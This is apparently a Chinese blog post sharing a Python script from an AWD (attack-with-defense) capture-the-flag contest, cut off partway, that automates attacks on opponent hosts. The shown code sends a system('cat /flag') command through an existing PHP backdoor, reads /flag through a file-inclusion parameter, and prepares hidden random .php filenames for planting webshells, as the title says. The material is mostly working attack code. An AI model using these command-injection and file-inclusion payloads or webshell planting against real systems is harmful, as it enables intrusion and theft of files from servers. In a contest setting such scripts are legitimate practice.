AWD FLAG脚本 之前AWD的自动写🐴获取flag脚本。 import requests import re import json import time import random def filename(): return '.'+str(int(random.uniform(10000000, 99999999)))+'.php' def exp1(target): url = 'http://'+target+'/admin/test.php' data = {"cmd":"system('cat /flag');"} try: r = requests.post(url=url, data=data, timeout=3) res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}' # res = re.findall(r"flag{.*}", r.text) print('[+]Flag Found: '+target+'->'+res) return res except Exception: pass def exp2(target): url = 'http://'+target+'/about.php?file=/flag' try: r = requests.get(url=url,timeout=3) res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}' print('[+]Flag Found: '+target+'->'+res) return res except Exception: pass def exp3(target): url = 'http://'+target+'/admin/editor.